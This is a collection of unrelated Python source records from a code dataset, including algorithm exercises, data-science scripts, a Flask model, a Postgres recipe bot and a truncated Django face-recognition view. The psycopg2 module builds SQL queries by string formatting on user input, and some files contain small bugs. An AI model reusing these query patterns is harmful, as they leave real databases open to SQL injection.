\"\"\nExplanation: There is no common prefix among the input strings.\n\nNote:\n\nAll given inputs are in lowercase letters a-z.\n\"\"\"\n\nfrom typing import List\n\n###############################################################################\n\"\"\"\nSolution: go position by position (index i), comparing ith char of each string \nto ith char of 1st string. 
Return on 1st string that ends or on 1st mismatch.\n\nO(n * min_len) time, where n = number of strings, and min_len = min length \namong all strings\n\nO(min_len) extra space: for string copy s[:i]\n\"\"\"\nclass Solution:\n #def longestCommonPrefix(self, strs: List[str]) -> str:\n def longestCommonPrefix(self, arr: List[str]) -> str:\n if not arr:\n return \"\"\n\n n = len(arr)\n s = arr[0]\n m = len(s)\n\n for i in range(m): # loop through positions; ith char\n ch = s[i]\n\n for j in range(1, n): # loop through strings in array; jth string\n \n # Case 1: found another string with length <= first string,\n # and that string has ended.\n # Case 2: found a character mismatch\n if i == len(arr[j]) or arr[j][i] != ch:\n return s[:i]\n\n # s is the shortest string and no mismatch was found\n return s\n \n\"\"\"\nSolution 1b: same as sol 1, but find min length among all strings first.\n\nO(nm), where n = number of strings, and m = min string length\nO(m) extra space: for string copies s[:i] and s[:m]\n\"\"\" \nclass Solution1b:\n def longestCommonPrefix(self, arr: List[str]) -> str:\n if not arr:\n return \"\"\n\n s = arr[0]\n m = min(len(s) for s in arr) # min length among all strings\n\n for i in range(m): # loop through positions\n ch = s[i]\n if any(t[i] != ch for t in arr):\n return s[:i]\n\n return s[:m]\n\n\"\"\"\nSolution 1c: same as sol 1, but find string of min length first.\n\"\"\"\nclass Solution1c:\n def longestCommonPrefix(self, arr: List[str]) -> str:\n if not arr:\n return \"\"\n\n s = min(arr, key=len) # shortest string\n\n for i, ch in enumerate(s):\n if any(t[i] != ch for t in arr):\n return s[:i]\n\n return s\n\n###############################################################################\n\"\"\"\nSolution 2: use zip() and set().\n\"\"\"\nclass Solution2:\n def longestCommonPrefix(self, arr: List[str]) -> str:\n if not arr:\n return \"\"\n\n for i, letters_in_pos in enumerate(zip(*arr)):\n if len(set(letters_in_pos)) != 1:\n return arr[0][:i]\n\n return min(arr)\n\n###############################################################################\n\"\"\"\nSolution 3: use os.path.commonprefix()\n\"\"\"\nimport os\nclass Solution3:\n def longestCommonPrefix(self, arr: List[str]) -> str:\n return os.path.commonprefix(arr)\n\n###############################################################################\n\nif __name__ == \"__main__\":\n def test(arr, comment=None):\n print(\"=\"*80)\n if comment:\n print(comment)\n\n print(f\"\\narr = {arr}\")\n \n res = sol.longestCommonPrefix(arr)\n\n print(f\"\\nres = {res}\\n\")\n \n\n sol = Solution() # brute force\n sol = Solution1b() # find min length among all strings first\n sol = Solution1c() # find string of min length first\n\n sol = Solution2() # use zip() and set()\n #sol = Solution3() # use os.path.commonprefix()\n\n comment = \"LC ex1; answer = fl\"\n arr = [\"flower\",\"flow\",\"flight\"]\n test(arr, comment)\n\n comment = \"LC ex1; answer = (empty string)\"\n arr = [\"dog\",\"racecar\",\"car\"]\n test(arr, comment)\n\n comment = \"LC TC; answer = (empty string)\"\n arr = []\n test(arr, comment)\n\n comment = \"LC TC; answer = (empty string)\"\n arr = [\"\"]\n test(arr, comment)\n \n comment = \"LC TC; answer = a\"\n arr = [\"a\"]\n test(arr, comment)\n\n comment = \"LC TC; answer = a\"\n arr = [\"aa\", \"a\"]\n test(arr, comment)\n\n comment = \"LC TC; answer = aa\"\n arr = [\"aacc\",\"aa\",\"aa\",\"aa\",\"aaca\"]\n test(arr, 
comment)\n","sub_path":"string/0014_longest_common_prefix.py","file_name":"0014_longest_common_prefix.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"509863056","text":"from googleapiclient.discovery import build\r\nfrom google_auth_oauthlib.flow import InstalledAppFlow\r\nimport pickle\r\nimport sys\r\nimport os\r\n\r\n# pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib\r\ndef create_meeting(dog_name, place, time, owner_email, client_email):\r\n path = os.path.dirname(__file__)\r\n credentials = pickle.load(open(f\"{path}/token.pkl\", \"rb\"))\r\n service = build(\"calendar\", \"v3\", credentials=credentials)\r\n\r\n event = {\r\n 'summary': 'Meeting with ' + dog_name,\r\n 'location': place,\r\n 'description': 'meeting with the dog and the owners',\r\n 'start': {\r\n 'dateTime': time +':00',\r\n 'timeZone': 'Asia/Jerusalem',\r\n },\r\n 'end': {\r\n 'dateTime': time +':00',\r\n 'timeZone': 'Asia/Jerusalem',\r\n },\r\n 'attendees': [\r\n {'email': owner_email},\r\n {'email': client_email}\r\n ],\r\n 'reminders': {\r\n 'useDefault': False,\r\n 'overrides': [\r\n {'method': 'email', 'minutes': 24 * 60},\r\n {'method': 'popup', 'minutes': 10},\r\n ],\r\n },\r\n }\r\n\r\n event = service.events().insert(calendarId='primary', body=event, sendUpdates='all').execute() # pylint: disable=no-member\r\n print ('Event created: %s' % (event.get('htmlLink')))\r\n\r\nif __name__ == '__main__':\r\n create_meeting(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])","sub_path":"meeting/create_meeting.py","file_name":"create_meeting.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"42149384","text":"import storm\nimport langid\n#from dysl.langid import LangID\n\nclass GetLanguageBolt(storm.BasicBolt):\n def process(self, tup):\n text = tup.values[1]\n language = langid.classify(text)[0]\n #l = LangID()\n #l.train()\n #language = l.classify(text)\n storm.emit([tup.values[0], language])\n\nGetLanguageBolt().run()\n","sub_path":"multilang/resources/getlanguage.py","file_name":"getlanguage.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"650880413","text":"# coding:utf-8\nfrom flask_admin.contrib.sqla import ModelView\nfrom managesys import db, admin,is_debug\nfrom datetime import datetime\n\nclass ClientStatus(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n pic_one = db.Column(db.Integer)\n pic_two= db.Column(db.Integer)\n face= db.Column(db.Integer)\n create_time = db.Column(db.DateTime)\n\n def __init__(self, pic_one, pic_two,face):\n self.pic_one = pic_one\n self.pic_two = pic_two\n\n def __repr__(self):\n return '' % self.usernam\n\nclass ClientStatusView(ModelView):\n # 是否允许创建\n can_create = False\n # 显示的字段\n column_searchable_list = ('pic_one', 'pic_two',\"face\",\"create_time\")\n\n def is_accessible(self):\n return is_debug\n\n def __init__(self, session, **kwargs):\n super(ClientStatusView, self).__init__(ClientStatus, session, **kwargs)\n\nadmin.add_view(ClientStatusView(db.session))","sub_path":"managesys/service/screen/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"166493254","text":"import matplotlib.pyplot as 
plt\nimport numpy as np\n\na = np.arange(-4, 4)\nb = np.arange(5)\n\nlangs = ['C', 'C++', 'Java', 'Python', 'PHP']\nstudents = [23,17,35,29,12]\n\n\nplt.bar(langs, students, color ='maroon',\n        width = 0.4)\n\nplt.xlabel(\"Courses offered\")\nplt.ylabel(\"No. of students enrolled\")\nplt.title(\"Students enrolled in different courses\")\nplt.show()\n\nprint()","sub_path":"classification/experiment/feature/experiment_bar_plot.py","file_name":"experiment_bar_plot.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}{"seq_id":"362986419","text":"import os\nimport psycopg2\n\nDATABASE_URL = os.environ['DATABASE_URL']\n\nconn = psycopg2.connect(DATABASE_URL, sslmode='require')\ncursor = conn.cursor()\n \ndef new_register(user_lineid):\n    cursor.execute(\"INSERT INTO recipe(user_id) VALUES('{0}');\".format(user_lineid))\n    conn.commit()\n    return\n\ndef reg_menu_name(user_lineid, menu_name):\n    # fetch the user's latest row and set the menu name\n    cursor.execute(\"UPDATE recipe SET name = '{0}' WHERE id = (SELECT id FROM recipe WHERE user_id= '{1}' ORDER BY id DESC LIMIT 1);\".format(menu_name, user_lineid))\n    conn.commit()\n    return \n\ndef reg_menu_recipe(user_lineid, menu_recipe):\n    # fetch the user's latest row and set the recipe\n    cursor.execute(\"UPDATE recipe SET recipe = '{0}' WHERE id = (SELECT id FROM recipe WHERE user_id= '{1}' ORDER BY id DESC LIMIT 1);\".format(menu_recipe, user_lineid))\n    conn.commit()\n    return \n\ndef db_search(user_lineid, menu_name):\n    # if the same name was registered more than once, fetch the latest one\n    cursor.execute(\"SELECT recipe FROM recipe WHERE user_id= '{0}' and name= '{1}' and recipe IS NOT NULL ORDER BY id DESC LIMIT 1;\".format(user_lineid, menu_name))\n    hoge = cursor.fetchall()\n    if len(hoge) == 0:\n        return hoge\n    else:\n        return hoge[0][0]\n\n# has the user's latest entry finished registering?\n# both name and recipe have values ==> registration is finished / a new entry can be added\ndef finish_register(user_lineid):\n    cursor.execute(\"SELECT * FROM recipe WHERE name IS NOT NULL and recipe IS NOT NULL and id = (SELECT id FROM recipe WHERE user_id= '{0}' ORDER BY id DESC LIMIT 1)\".format(user_lineid))\n    hoge = cursor.fetchall()\n    if len(hoge) == 0:\n        return False\n    else:\n        return True\n\ndef serch_user(user_lineid):\n    cursor.execute(\"SELECT * FROM recipe WHERE user_id= '{0}'\".format(user_lineid))\n    hoge = cursor.fetchall()\n    if len(hoge) == 0:\n        return False\n    else:\n        return True\n\ndef check_latest_column(user_lineid, column):\n    if column == 'name':\n        # from the user's latest row, select the ones where both name and recipe are empty\n        cursor.execute(\"SELECT * FROM recipe WHERE name IS NULL and recipe IS NULL and id = (SELECT id FROM recipe WHERE user_id= '{0}' ORDER BY id DESC LIMIT 1);\".format(user_lineid))\n    if column == 'recipe':\n        # from the user's latest row, select the ones where name is set and recipe is empty\n        cursor.execute(\"SELECT * FROM recipe WHERE name IS NOT NULL and recipe IS NULL and id = (SELECT id FROM recipe WHERE user_id= '{0}' ORDER BY id DESC LIMIT 1);\".format(user_lineid))\n    \n    hoge = cursor.fetchall()\n    if len(hoge) != 0:\n        return False\n    else:\n        return True\n\n","sub_path":"db_line.py","file_name":"db_line.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}{"seq_id":"564065045","text":"def seive(n):\r\n\tl = [1 for i in range(n+1)]\r\n\tl[0] = l[1] = 0\r\n\tfor i in range(2, int(n**.5)+1):\r\n\t\tif l[i]:\r\n\t\t\tfor j in range(i+i, n+1, i):\r\n\t\t\t\tl[j] = 0\r\n\treturn [k for k, j in enumerate(l) if j]\r\nl = seive(32000)\r\ndef prime_factors(k):\r\n\td = {}\r\n\ti = 0\r\n\twhile 1:\r\n\t\tif i 
>= 3432:\r\n\t\t\td[k] = 1\r\n\t\t\tbreak\r\n\t\telif l[i] > k:\r\n\t\t\tbreak\r\n\t\telif k % l[i] == 0:\r\n\t\t\td[l[i]] = 1\r\n\t\t\tk //= l[i]\r\n\t\telse:\r\n\t\t\ti += 1\r\n\treturn d\r\n# print(l[:20])\r\nwhile 1:\r\n\tn = int(input())\r\n\tif n == 0:\r\n\t\tbreak\r\n\ts = prime_factors(n)\r\n\tfor i in s:\r\n\t\tn *= (1-1.0/i) \r\n\tprint(int(n))","sub_path":"relatives.py","file_name":"relatives.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"386993359","text":"import sys\n\ninFile1 = sys.argv[1]\ninFile2 = sys.argv[2]\n\nannotation = [x.strip() for x in open(inFile1,'r')]\nall_tweets = [x.strip() for x in open(inFile2,'r')]\n\ndictje = dict()\n\ncounter = 0\n\nfor event in all_tweets:\n\tcounter += 1\n\tsplitLine = event.split('\\t')\n\tident = splitLine[0].strip()\n\tdictje[ident] = event\n\ncount = 0\n\nfor event in annotation:\n\tsplitLine = event.split('\\t')\n\tident = splitLine[0].strip()\n\toldTweetsRanked = splitLine[5].split('-----')\n\toldTweetsRanked2 = splitLine[6].split('-----')\n\tprint(splitLine[3],splitLine[1],'\\n')\n\tprint(oldTweetsRanked[0])\n\tprint(oldTweetsRanked2[0],'\\n')\n\t\t\t\n\n","sub_path":"switch_old_tweets.py","file_name":"switch_old_tweets.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"441637841","text":"from elasticsearch_dsl import analyzer, tokenizer\nfrom django_elasticsearch_dsl_drf.versions import ELASTICSEARCH_GTE_7_0\n\n__all__ = (\"html_strip\",)\n\n# The ``standard`` filter has been removed in Elasticsearch 7.x.\nif ELASTICSEARCH_GTE_7_0:\n _filters = [\"lowercase\", \"stop\", \"snowball\", \"asciifolding\"]\nelse:\n _filters = [\"standard\", \"lowercase\", \"stop\", \"snowball\", \"asciifolding\"]\n\nhtml_strip = analyzer(\n \"html_strip\", tokenizer=\"lowercase\", filter=_filters, char_filter=[\"html_strip\"]\n)\n\n\ncustom_analyzer = analyzer(\n \"custom_analyzer\",\n tokenizer=tokenizer(\"trigram\", \"ngram\", min_gram=3, max_gram=3),\n filter=_filters,\n)\n","sub_path":"searchindexesapp/analyzers.py","file_name":"analyzers.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"548774446","text":"import argparse, datetime, measures, os, umls_tables_processing, utils\nfrom collections import defaultdict\nfrom multiprocessing import Pool\nimport numpy as np\n\nfrom gensim.models import KeyedVectors, Word2Vec\nfrom gensim.test.utils import datapath\n\n\ndef analog_loop(path, \n binary_bool,\n name,\n type_emb,\n L, K,\n K_type, logger,\n analog_comp_dict,\n #sets_relations,\n metrics,\n dict_labels_for_L = None):\n \n # Load the w2v model\n model = KeyedVectors.load_word2vec_format(path, binary=binary_bool)\n \n # Instantiation and log print\n analog_comp_dict[name] = {}\n logger.info('\\n\\n The name of embedding is: %s\\n', name)\n dict_t = {}\n dict_t[name] = {}\n \n # Loop over the relations\n for rela in umls_tables_processing.USEFUL_RELA:\n logger.info('\\n The RELA is: %s\\n', rela)\n \n # Check type of embedding\n if type_emb=='/cuis/':\n c = datetime.datetime.now().replace(microsecond=0)\n l0, k0 = measures.k_n_l_iov(L[rela], \n K[rela],\n model, \n logger = logger,\n emb_type = 'cui')\n \n # sets_relations keeps track of the number of pairs of K and L sets. 
\n            # The number of filtered pairs on Vemb, per relation are stored\n#            sets_relations[rela].append((name+'_l'+K_type, np.shape(l0)))\n#            sets_relations[rela].append((name+'_k'+K_type, np.shape(k0)))\n            \n            # Save the pickle variable\n#            utils.inputs_save(sets_relations, 'Utilities/sets_relations' + name + K_type)\n            \n            # Compute the analogy and store the results\n            tmp = measures.analogy_compute(l0, k0, \n                                           model,\n                                           metrics,\n                                           logger = logger,\n                                           emb_type = 'cui')\n            dict_t[name][rela] = tmp\n            \n            # Compute the sum of analogy hits and store it.\n            #if len(tmp)>0:\n            #    analog_comp_dict[name][rela] = (sum(list(zip(*tmp))[2]), len(tmp))\n            #else:\n            #    analog_comp_dict[name][rela] = (0, len(tmp)) \n\n            utils.inputs_save(dict_t, 'Utilities/Analogical Data/' + name + K_type) \n            #utils.inputs_save(analog_comp_dict, 'Utilities/count_analog_' + name + K_type)\n            \n            # Log of end of 'relation' operation\n            logger.info('The time for RELA %s, for embedding %s is %s', \n                        rela,\n                        name,\n                        str(datetime.datetime.now().replace(microsecond=0)-c))\n        \n        # Check type of embedding: for word embeddings the dictionary of labels per cui is required\n        elif (type_emb=='/words/') and (dict_labels_for_L is not None):\n            c = datetime.datetime.now().replace(microsecond=0)\n            \n            # Filter the dictionary of labels keeping only the labels-words present into the embedding\n            Vemb =utils.extract_w2v_vocab(model)\n            dict_labels_inters_vemb = umls_tables_processing.discarding_labels_oov(Vemb, dict_labels_for_L)\n            # Filtering L and K sets for present labels inside the embedding\n            l0, k0 = measures.k_n_l_iov(L[rela], \n                                        K[rela],\n                                        model, \n                                        logger = logger,\n                                        dict_labels_for_L = dict_labels_inters_vemb,\n                                        emb_type = 'labels')\n\n            # Store number of filtered pairs\n#            sets_relations[rela].append((name+'_l'+K_type, np.shape(l0)))\n#            sets_relations[rela].append((name+'_k'+K_type, np.shape(k0)))\n\n#            utils.inputs_save(sets_relations, 'Utilities/sets_relations' + name + K_type)\n            \n            tmp = measures.analogy_compute(l0, k0, \n                                           model, \n                                           metrics,\n                                           logger = logger,\n                                           dict_labels_for_L = dict_labels_inters_vemb, \n                                           emb_type = 'labels') \n            \n            dict_t[name][rela] = tmp\n            \n            #if len(tmp)>0:\n            #    analog_comp_dict[name][rela] = (sum(list(zip(*tmp))[2]), len(tmp))\n            #else:\n            #    analog_comp_dict[name][rela] = (0, len(tmp))\n            \n            utils.inputs_save(dict_t, 'Utilities/Analogical Data/' + name + K_type) \n            #utils.inputs_save(analog_comp_dict, 'Utilities/count_analog_' + name + K_type)\n            \n            logger.info('The time for RELA %s, for embedding %s is %s', \n                        rela,\n                        name,\n                        str(datetime.datetime.now().replace(microsecond=0)-c))\n\n    \ndef analog_pipe(L, K,\n                dict_labels_for_L,\n                logger, \n                K_type,\n                metrics,\n                parallel = False,\n                embedding_type = 'both'):\n    \n    a = datetime.datetime.now().replace(microsecond=0)\n    \n    # Storing expression of relations in sets K and L\n#    sets_relations = defaultdict(list)\n#    for k in umls_tables_processing.USEFUL_RELA:\n#        sets_relations[k].append(('L_umls', np.shape(L[k])))\n#        sets_relations[k].append(('K'+K_type, np.shape(K[k])))\n#    print('Numbers of pairs for relationships stored')\n    \n    # Loading w2v files\n    PATH_EMBEDDINGS = './Embeddings'\n    embeddings = []\n    \n    # CUI or Word Embeddings discrimination\n    if (embedding_type == 'cuis') or (embedding_type == 'both'):\n        logger.info('CUI embeddings\\n')\n        cuis = ('/cuis/', [f.name for f in os.scandir(PATH_EMBEDDINGS+'/cuis') if (f.is_file())&(f.name != 'README.md')])\n        embeddings.append(cuis)\n    \n    if (embedding_type == 'words') or (embedding_type == 'both'): # plain 'if', not 'elif', so that 'both' also collects the word embeddings\n        logger.info('Word embeddings\\n')\n        labels = 
('/words/', [f.name for f in os.scandir(PATH_EMBEDDINGS+'/words') if (f.is_file())&(f.name != 'README.md')])\n embeddings.append(labels)\n \n # Universal dictionary instantiation\n analog_comp_dict = {}\n \n for type_emb in embeddings:\n b = datetime.datetime.now().replace(microsecond=0)\n if parallel:\n # Multiprocessing logic for evaluating at the same time K for only copd related concepts\n # and for seed related concepts\n # If processes are more than 4, the performance is low given the expensive memory cost\n if len(type_emb[1]) > 4:\n # Processes set at 2\n processes = 2\n # Elements of a chunk\n #n = int(np.ceil(len(embeddings[1][1])/processes))\n n = processes\n # A list of sublist with embedding names\n chunk_embs = [type_emb[1][i:i + n] for i in range(0, len(type_emb[1]), n)]\n print(chunk_embs)\n for chunk in chunk_embs:\n inp = []\n for title in chunk:\n # Creation of a process for each embedding (max two embeddings)\n inp.append((PATH_EMBEDDINGS+type_emb[0]+title,\n title.endswith('.bin'),\n os.path.splitext(title)[0],\n type_emb[0], \n L, K,\n K_type,\n logger,\n analog_comp_dict,\n #sets_relations,\n metrics,\n dict_labels_for_L))\n \n with Pool(processes = n) as pool:\n pool.starmap(analog_loop, inp) \n else:\n args = []\n for emb in type_emb[1]:\n # Instantiation of args for multiprocessing run\n args.append((PATH_EMBEDDINGS+type_emb[0]+emb,\n emb.endswith('.bin'),\n os.path.splitext(emb)[0],\n type_emb[0], \n L, K,\n K_type,\n logger,\n analog_comp_dict,\n #sets_relations,\n metrics,\n dict_labels_for_L)) \n \n logger.info('Preprocessing finished and multiprocessing running started\\n')\n with Pool(processes = len(args)) as pool:\n pool.starmap(analog_loop, args) \n else:\n for emb in type_emb[1]:\n analog_loop(PATH_EMBEDDINGS+type_emb[0]+emb, \n emb.endswith('.bin'),\n os.path.splitext(emb)[0],\n type_emb[0], \n L, K,\n K_type,\n logger,\n analog_comp_dict,\n #sets_relations,\n metrics,\n dict_labels_for_L)\n \n logger.info('The time for analogical computation of %s is %s', \n type_emb,\n str(datetime.datetime.now().replace(microsecond=0)-b)) \n logger.info('Execution time of analog_pipe: ' + str(datetime.datetime.now().replace(microsecond=0) - a) + '\\n')\n\n \nif __name__ == '__main__':\n # Parsing values for fast and intuitive launch of the script: \n # paralleling, embedding_type, copd_K_switch are inserted by command line.\n parser = argparse.ArgumentParser(description='Launching analogy computation')\n parser.add_argument('--p', \n dest='paralleling',\n type=bool,\n default = False,\n required=False,\n help='The multiprocessing switch')\n \n parser.add_argument('--t',\n dest='embedding_type',\n type=str,\n default = 'both',\n required=False,\n help='The type of analyzed embedding: it could be \"both\", \"cuis\", or \"words\"')\n \n parser.add_argument('--K_copd',\n dest='copd_K_switch',\n type=bool,\n default = False,\n required=False,\n help='The choosen K_umls set: True for copd K')\n \n parser.add_argument('--L',\n dest='L_type',\n type=bool,\n default = False,\n required=False,\n help='The choosen L_umls set: False for L, True for L=K')\n \n parser.add_argument('--K',\n dest='k_most_similar',\n type=int,\n default = 10,\n required=False,\n help='The choosen k_most_similar value')\n \n parser.add_argument('--eps',\n dest='eps',\n type=float,\n default = 0.0001,\n required=False,\n help='The choosen epsilon value')\n \n parser.add_argument('--m', \n nargs='+', \n dest='measure',\n default=['add'],\n type=str,\n help='The requested measures')\n \n args = 
parser.parse_args()\n print(args)\n \n # Check on quality of inserted data\n # Embedding type\n assert args.embedding_type in ['both', 'cuis', 'words'], \"Insert a string like 'both', 'cuis', or 'words'\"\n \n # Measures check\n assert ('all' in args.measure and len(args.measure)==1) or (len(set(args.measure).intersection(set(['add', 'mul', 'pair']))) == len(args.measure)), \"Choose if take 'all' or only certain measures among 'add', 'mul', 'pair'\"\n\n # Logger instantiation\n logger = utils.setup_custom_logger('myapp')\n logger.info('Start\\n')\n \n # K_umls only for copd related concepts or for all.\n if args.copd_K_switch:\n K_umls = umls_tables_processing.count_pairs(umls_tables_processing.USEFUL_RELA, \n cuis_list = [umls_tables_processing.COPD])\n label_K = '_umls_copd' \n \n else:\n # CUIs \n concepts = umls_tables_processing.concepts_related_to_concept(concept = umls_tables_processing.COPD,\n two_way = True,\n polishing_rels = False,\n switch_key = 'con',\n extract_labels = False)\n logger.info('Seeds built\\n')\n K_umls = umls_tables_processing.count_pairs(umls_tables_processing.USEFUL_RELA, cuis_list = concepts)\n label_K = '_umls'\n \n # Set L building - limited relations for lightening the compute\n if args.L_type:\n L_umls = K_umls\n label_K = '_LsameasK'+label_K\n else:\n L_umls = umls_tables_processing.count_pairs(umls_tables_processing.USEFUL_RELA)\n \n logger.info('Sets created\\n')\n \n # Building the dictionary for labels case\n # Collecting all the CUIs involved in set L\n if (args.embedding_type == 'words') | (args.embedding_type == 'both'):\n jh = []\n for v in L_umls.values():\n jh.append(list(set(list(zip(*v))[0])))\n jh.append(list(set(list(zip(*v))[1])))\n tmp = set([j for i in jh for j in i ])\n dict_strings = umls_tables_processing.cui_strings() \n dict_labels_for_L, _ = umls_tables_processing.extracting_strings(list(tmp), dict_strings = dict_strings)\n \n else:\n dict_labels_for_L = None\n logger.info('Dictionary of labels from set L built\\n')\n \n # Building the dictionary for the measure, in place of the switch-case logic\n meas_dict = {'add': [measures.cos3add, args.k_most_similar],\n 'mul': [measures.cos3mul, args.eps], \n 'pair': [measures.pair_direction, args.eps]}\n \n if 'all' in args.measure:\n meas_dict = meas_dict\n \n else:\n m = np.sort(args.measure).tolist()\n meas_dict = {key: meas_dict[key] for key in m if key in meas_dict}\n \n # Start analogy pipeline\n analog_pipe(L_umls, K_umls, \n dict_labels_for_L, \n logger, \n label_K, \n meas_dict,\n parallel = args.paralleling,\n embedding_type = args.embedding_type)\n \n ","sub_path":"analogy_pipeline.py","file_name":"analogy_pipeline.py","file_ext":"py","file_size_in_byte":15588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"520566812","text":"from cvar.gridworld.core.constants import gamma\nfrom cvar.gridworld.cliffwalker import *\nfrom cvar.gridworld.core import cvar_computation\nfrom cvar.gridworld.core.constants import gamma\nfrom cvar.gridworld.core.runs import epoch\nfrom cvar.gridworld.algorithms.value_iteration import value_iteration\n\n\ndef several_epochs(arg):\n np.random.seed()\n world, policy, nb_epochs = arg\n rewards = np.zeros(nb_epochs)\n\n for i in range(nb_epochs):\n S, A, R = epoch(world, policy)\n policy.reset()\n rewards[i] = np.sum(R)\n rewards[i] = np.dot(R, np.array([gamma ** i for i in range(len(R))]))\n\n return rewards\n\n\ndef policy_stats(world, policy, alpha, nb_epochs, verbose=True):\n import copy\n import 
multiprocessing as mp\n threads = 4\n\n with mp.Pool(threads) as p:\n rewards = p.map(several_epochs, [(world, copy.deepcopy(policy), int(nb_epochs/threads)) for _ in range(threads)])\n\n rewards = np.array(rewards).flatten()\n\n var, cvar = cvar_computation.var_cvar_from_samples(rewards, alpha)\n if verbose:\n print('----------------')\n print(policy.__name__)\n print('expected value=', np.mean(rewards))\n print('cvar_{}={}'.format(alpha, cvar))\n # print('var_{}={}'.format(alpha, var))\n\n return cvar, rewards\n\n\ndef exhaustive_stats(world, epochs, *args):\n V = value_iteration(world)\n\n alphas = np.array([1.0, 0.5, 0.25, 0.1, 0.05, 0.025, 0.01, 0.005, 0.001])\n\n cvars = np.zeros((len(args), len(alphas)))\n names = []\n\n for i, policy in enumerate(args):\n names.append(policy.__name__)\n for j, alpha in enumerate(alphas):\n pol = policy(V, alpha)\n\n cvars[i, j], _ = policy_stats(world, pol, alpha=alpha, nb_epochs=int(epochs), verbose=False)\n\n print('{}_{} done...'.format(pol.__name__, alpha))\n\n import pickle\n pickle.dump({'cvars': cvars, 'alphas': alphas, 'names': names}, open('data/stats.pkl', 'wb'))\n print(cvars)\n\n from cvar.gridworld.plots.other import plot_cvars\n plot_cvars()\n\n\nif __name__ == '__main__':\n import pickle\n from cvar.gridworld.plots.grid import InteractivePlotMachine\n\n # np.random.seed(2)\n # # ============================= new config\n stoch = 0.1\n world = GridWorld(7, 10, random_action_p=stoch)\n V = value_iteration(world, max_iters=1000, eps_convergence=1e-5)\n pickle.dump((world, V), open('./results/vi_{}.pkl'.format(stoch), mode='wb'))\n\n # ============================= load\n world, V = pickle.load(open('./results/vi_{}.pkl'.format(stoch), 'rb'))\n\n for alpha in [1,0.04, 0.01]:\n # ============================= RUN\n img = np.array([V.V[ix].cvar_alpha(alpha) for ix in np.ndindex(V.V.shape)]).reshape(V.V.shape)\n pickle.dump(img, open('./results/map_{}_{}.pkl'.format(alpha, stoch), 'wb'))\n\n #Optimal path\n path = V.optimal_path(alpha)\n opt_path = [ [s[1] for s in path], [s[0] for s in path] ]\n pickle.dump(opt_path, open('./results/path_{}_{}.pkl'.format(alpha, stoch), 'wb'))\n\n \n # pm = InteractivePlotMachine(world, V, alpha=0.01, stochasticity = stoch)\n # # pm.show()\n\n # pm = InteractivePlotMachine(world, V, alpha=0.1, stochasticity = stoch)\n # # pm.show()\n\n # pm = InteractivePlotMachine(world, V, alpha=1, stochasticity = stoch)\n # # pm.show()\n\n","sub_path":"cvar/gridworld/run_vi.py","file_name":"run_vi.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"304268548","text":"import logging\nimport os\nimport pickle\nimport random\nimport string\n\nimport face_recognition\nimport numpy as np\nfrom PIL import Image\nimport cv2\nfrom django.conf import settings\nfrom django.shortcuts import render\nfrom mtcnn.mtcnn import MTCNN\n# Create your views here.\nfrom rest_framework import generics, status, permissions\nfrom rest_framework.response import Response\n\n# from Faceapp.utils import check_face\nfrom FaceRecognition.settings import KNOWN_FACE_DIRECTORY\n\nlogger = logging.getLogger(__name__)\n\nclass FaceRecognitionView(generics.GenericAPIView):\n def post(self,request):\n try:\n data = request.data\n logger.info('Request Payload {}'.format(data))\n patient_photo = data.get('patient_photo')\n if not patient_photo:\n return Response({'status': 'fail', 'message': 'Please Choose a Patient Photo'},\n 
status=status.HTTP_400_BAD_REQUEST)\n known_face_directory = KNOWN_FACE_DIRECTORY\n with open(settings.DATA_SET_PATH, 'rb') as f:\n all_face_encodings = pickle.load(f)\n\n unknown_image = face_recognition.load_image_file(patient_photo)\n\n if not face_recognition.face_encodings(unknown_image):\n return Response({'status': 'fail', 'message': 'Cant Detect Face'},status=status.HTTP_400_BAD_REQUEST)\n # unknown_face_encoding = face_recognition.face_encodings(unknown_image)[0]\n mtcnn = MTCNN()\n detected_face = ''\n faces = mtcnn.detect_faces(unknown_image)\n try:\n for face in faces:\n x,y,z,a = face['box']\n detected_face = unknown_image[y:y+a,x:x+z]\n except:\n return Response({'status': 'fail', 'message': 'Cant Detect Face'},status=status.HTTP_400_BAD_REQUEST)\n # import numpy as np\n if np.array(detected_face).size == 0 or detected_face =='':\n return Response({'status': 'fail', 'message': 'Cant Detect Face'},status=status.HTTP_400_BAD_REQUEST)\n locations = face_recognition.face_locations(detected_face, model='cnn')\n\n if not locations:\n return Response({'status': 'fail', 'message': 'Cant Detect Face second'},status=status.HTTP_400_BAD_REQUEST)\n encodings = face_recognition.face_encodings(detected_face, locations)\n\n face_names = list(all_face_encodings.keys())\n face_encodings = np.array(list(all_face_encodings.values()))\n for face_encoding, face_location in zip(encodings, locations):\n results = face_recognition.compare_faces(face_encodings, face_encoding, 0.45)\n match = None\n if True in results:\n match = face_names[results.index(True)]\n print(f\"Match found : {match}\")\n # add images to existing folder\n pil_img = Image.open(patient_photo)\n np_img = np.array(pil_img)\n img = cv2.cvtColor(np_img, cv2.COLOR_RGB2BGR)\n path = os.path.join(known_face_directory,match)\n photo_name = 